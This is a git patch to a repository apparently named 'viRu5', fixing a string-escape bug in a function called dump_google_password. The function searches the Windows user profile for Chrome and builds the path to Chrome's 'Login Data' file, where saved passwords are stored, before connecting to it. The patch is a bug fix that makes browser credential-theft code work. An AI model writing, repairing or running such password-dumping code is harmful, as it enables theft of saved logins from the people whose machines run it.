From 35f15db3370a1f2d405a02c0aed03f6f3e399448 Mon Sep 17 00:00:00 2001 From: iso53 <102249575+ISO53@users.noreply.github.com> Date: Sun, 3 Dec 2023 13:37:25 +0300 Subject: [PATCH] fixed (unicode error) 'unicodeescape' error changed string to raw string so backslashes will be treated as literal characters instead of escape characters --- viRu5/source.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/viRu5/source.py b/viRu5/source.py index 7eed6c3..0df7e28 100644 --- a/viRu5/source.py +++ b/viRu5/source.py @@ -68,7 +68,7 @@ def dump_google_password(): except IndexError: for w in os.walk(os.getenv('USERPROFILE')): if 'Chrome' in w[1]: - path = str(w[0]) + '\Chrome\User Data\Default\Login Data' + path = str(w[0]) + r'\Chrome\User Data\Default\Login Data' # Connect to the Database try: